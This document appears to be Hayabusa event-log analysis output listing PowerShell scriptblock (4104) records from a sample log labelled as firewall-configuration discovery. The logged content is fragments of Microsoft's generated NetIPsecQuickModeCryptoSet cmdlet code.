${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('PfsGroup')] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] 
[Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null 
[object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup')) { [object]$__cmdletization_value = ${PerfectForwardSecrecyGroup} $__cmdletization_methodParameter = 
Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'PfsGroupID'; ParameterType = 'Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecQuickModeCryptoSet' function Remove-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] 
[OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microso",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] 
[switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, 
[Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) 
$__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') 
} if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) 
{ $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecQuickModeCryptoSet' function Rename-NetIPsecQuickModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [Alias('PfsGroup')] [ValidateNotNull()] [Microsoft.Windows.Firewall.Commands.DiffieHellmanGroup[]] ${PerfectForwardSecrecyGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] 
${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } 
catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PerfectForwardSecrecyGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PerfectForwardSecrecyGroup}) $__cmdletization_queryBuilder.FilterByProperty('PfsGroupID', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) 
$__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletiza",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:06.020 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"tion_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleQMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', 
